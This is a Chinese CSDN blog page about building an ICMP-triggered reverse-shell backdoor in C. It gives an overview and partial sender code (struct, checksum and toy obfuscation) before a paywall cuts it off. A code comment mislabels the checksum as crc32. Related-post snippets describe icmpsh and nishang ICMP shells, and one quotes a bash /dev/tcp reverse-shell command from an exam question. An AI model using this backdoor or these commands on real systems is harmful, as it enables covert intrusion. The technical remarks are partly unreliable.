icmp实现shell反弹

最新推荐文章于 2022-12-29 15:20:56 发布
最新推荐文章于 2022-12-29 15:20:56 发布
阅读量244 收藏 1
点赞数
分类专栏: linux学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45833409/article/details/113514705
版权
#概述1.创建原始套接字(icmp),分别为发送端和接收端,另外再起一个进程绑定一个端口进行tcp监听。2.发送端向接收端发送icmp包后,接收端过滤icmp包后获得发送端发出的icmp包再解包和解密,当口令正确,解析icmp_data段的ip和port。3.拿到ip和port后,创建一个tcp套接字去connect这个addr,连接成功后将stdin,stdout,stderr重定向到创建的套接字中,再execl反弹shell就完成了.源码发送端#include <stdio.h>
摘要由CSDN通过智能技术生成

#概述
1.创建原始套接字(icmp),分别为发送端和接收端,另外再起一个进程绑定一个端口进行tcp监听。
2.发送端向接收端发送icmp包后,接收端过滤icmp包后获得发送端发出的icmp包再解包和解密,当口令正确,解析icmp_data段的ip和port。
3.拿到ip和port后,创建一个tcp套接字去connect这个addr,连接成功后将stdin,stdout,stderr重定向到创建的套接字中,再execl反弹shell就完成了.

源码
发送端


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <setjmp.h>
#include <errno.h>


#define PACKET_SIZE 4096
#define DATA_LEN 46

/*icmp包内存*/
char sendpacket[PACKET_SIZE]; //icmp packet size

/*传递密码和监听ip和port*/
 struct backcdoor
{
   
     char key[40];
     char cryip[10];
     char cryport[5];

};

typedef struct backcdoor backcdoor;

backcdoor send_bd;


unsigned short cal_chksum(unsigned short *addr,int len);
void cry_bd(backcdoor*bd);
void cry_bd(backcdoor*bd);
void send_packet(int sockfd,struct sockaddr_in *dst, int pid, backcdoor*bd);




//crc32的校验计算方法
unsigned short cal_chksum(unsigned short *addr,int len)
{
          
	int nleft=len;        
	int sum=0;        
	unsigned short *w=addr;        
	unsigned short answer=0;	    
	
	while(nleft>1)        
	{
          
		sum+=*w++;                
		nleft-=2;        
	}
	
	if( nleft==1)        
	{
          
		*(unsigned char *)(&answer)=*(unsigned char *)w;                
		sum+=answer;        
	}        

	sum=(sum>>16)+(sum&0xffff);        
	sum+=(sum>>16);        
	answer=~sum;        

	return answer;
}

/*加密*/
void cry_bd(backcdoor*bd)
{
   
    int len = strlen(bd->key);
    for(int i = 0; i < 31; i++)
    {
   
        bd->key[i] += 5;
    }
    bd->cryport[0] = bd->cryport[0] + 6;
    bd->cryip[0] = bd->cryip[0] + 1;

}


/*组包*/
int pack(int pid, backcdoor*bd)
{
   
    struct icmp *icmp;
    int packetsize=8
最低0.47元/天 解锁文章
qq_45833409
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fscan内网渗透神器
09-21
它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 2.主要功能 (1)信息搜集: 存活探测...
内网渗透之 ICMP(icmpsh) 协议反弹Shell
The current road is different, love needs to distinguish between right and wrong
04-09 5064
简介 最常见的ICMP消息为Ping命令的回复,通过ping命令访问远程计算机,尝试进行ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙不会屏蔽ping数据包)。 常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。 这里使用 icmpsh跨平台工具,python版本 < python3。 实验环境 kali:192.168.95.128 windows7:192.168.9
icmp反弹shell 简介
whatday的专栏
04-09 973
目录 第一节 轶事 第二节 技术原理 第三节 ICMP反弹shell 第一节 轶事 首次听说icmp隧道,要从免费上网说起。当年的网费还是挺贵的,大学生上个网还是容易“破产”呀。当你的网费耗尽后,网管服务器就会拦截你的网络请求,但是只拦截了TCP和UDP协议,放过了ICMP协议,ping ip还是可以的,于是就开始琢磨利用icmp隧道将访问转发到自己的一台放置在公网中的代理,利用代...
ICMP shell
weixin_30670965的博客
04-22 498
场景 反向shell的场景下使用 原理 ICMP作为获取反向shell的通道 实践 运行 run.sh报错,可能是因为用的Parrot。改一下就可以了 ifconfig | grep 'inet '| grep -v '127.0.0.1' | awk '{ print $2}' 或者直接运行主要命令。 攻击者机器运行: sysctl -w net.ipv4.icmp_echo_ign...
利用icmpsh建立icmp隧道反弹shell
huayimy的博客
12-29 749
利用icmpsh建立icmp隧道反弹shell,安装pip2,安装impacket模块,raise ReadTimeoutError,Failed to build future
通过ICMP协议反弹SHELL并执行命令
Fly_鹏程万里
05-23 3629
前言内网中的大多数系统都位于防火墙和企业代理之后,以便控制入口以及出口流量。防火墙可以拦截到反连的shell,但ICMP协议基本上是不拦截的。因此,为了获得shell并在目标主机上执行命令,可以使用ICMP协议作为隐藏通道进行连接。使用icmpsh(https://github.com/inquisb/icmpsh)工具可用来执行此攻击。推特上的大牛@Bernardo Damele已经将其导入到他...
内网综合扫描工具fscan的详细使用
03-27
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 主要功能 1.信息搜集: 存活探测(icmp) ...
小米2019秋招安全开发笔试题.docx
07-11
- `bash -i >& /dev/tcp/192.168.1.2/8080 0>&1` 是一个反弹 shell 命令,可以将 shell 输出重定向到指定的 IP 和端口。正确答案是 a. 这不是一个反弹 shell 和 c. 这是一个反弹 shell。 10. **缓冲区溢出保护机制...
vc++ 应用源码包_1
09-15
IOCP反弹远控客户端模型,外加上线服务端,全部代码注释! 如题。这个是IOCP远程控制软件的模型,服务端运行后会自动发送本机信息到客户端,客户端采用IOCP重叠机制。 IOCP封装类(DLL)发布 主要是CIocpSrv"伪类",...
vc++ 应用源码包_2
09-15
IOCP反弹远控客户端模型,外加上线服务端,全部代码注释! 如题。这个是IOCP远程控制软件的模型,服务端运行后会自动发送本机信息到客户端,客户端采用IOCP重叠机制。 IOCP封装类(DLL)发布 主要是CIocpSrv"伪类",...
ICMP Shell-开源
05-01
ICMP Shell(ISH)是类似于telnet的协议。 它允许用户连接到远程主机,并仅使用ICMP来发送和接收数据,从而打开外壳。 ICMP Shell是用C语言编写的,用于UNIX环境。
icmp-remote-shell:使用ICMP协议进行数据隐藏的隐写术远程Shell的原型
05-14
ICMP远程外壳 使用ICMP协议进行数据隐藏的隐写术远程Shell的原型。 要安装数据包,请使用pip: pip install icmp_remote_shell Packet提供了一些可以在您的ICMP隐写术项目中使用的常用功能: 校验和-计算数据包校验和 send_one_ping-发送一个ICMP数据包 send_one-和以前一样,但是更方便 start_sniffing-启动ICMP数据包嗅探器 Packet还提供用于创建远程Shell的命令行工具。 icmp-remote-shell-client -ICMP远程Shell客户端 用法: icmp-remote-shell-client host_out host_in [ping_delay] [log_file] 在哪里: host_out-发送请求的接口 host_in-侦听答复的界面 ping_de
利用ICMP协议反弹shell
不忘初心,护天下安全!
07-20 1061
网络管理员通常使用各种各样的防火墙,以拦截各类渗透测试动作,如某防火墙允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。然而很多时候,为了方便运维管理,在各种安全策略中,ICMP协议通常是不会过滤的,通俗点说就是不会禁PING。ICMP(InternetControlMessageProtocol)Internet控制报文协议,是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。...
icmp for linux,linux安装ICMP shellicmp后门)
weixin_32264185的博客
05-29 325
一:安装ICMP SHELLwgethttp://cdnetworks-kr-1.dl.sourceforge.net/project/icmpshell/ish/v0.2/ish-v0.2.tar.gztarzxvfish-v0.2.tar.gzcdISHELL-v0.2/makelinux第四步可根据自己是实际情况而定,你可以先执行make命令,然后它会给你提示:我这里是redhat...
ICMPSH的学习ICMP反弹shell
来到了学渣的博客
06-04 1356
ICMP隧道 最常见的ping命令就是利用的ICMP协议,使用该协议反弹shell,两台机器不需要开放端口,ICMP隧道简单好用。 实验环境 Kali 192.168.10.144 win7 192.168.10.129 kali安装好icmpsh工具 root@kali:~# git clone https://github.com/inquisb/icmpsh.git 安装icmpsh的依赖包 root@kali:~# apt-get install python-impacket 执行之前最重要
nishangICMP反弹shell攻击
wodepzw的博客
11-19 288
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 2.用管理员权限打开powe...
我眼中的nishangICMP反弹shell攻击
ovowovo的博客
11-29 416
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 在这里插入图片描述 2.用...
icmpsh之icmp反弹shell
weixin_45729208的博客
03-31 327
一,技术原理 向ping www.baidu.com时,本机会先向百度的服务器发送ICMP请求包,如果请求成功了,则百度服务器会回应ICMP的响应包 引用百度百科: ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 二,实验环境 攻击机
windows 反弹shell
最新发布
07-29
此外,还有一些基于PowerShell的攻击框架,如Nishang,它集合了一些PowerShell攻击脚本和有效载荷,可用于反弹TCP/UDP/HTTP/HTTPS/ICMP等类型的shell。\[3\] 总结起来,Windows反弹shell的方法包括使用Metasploit...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值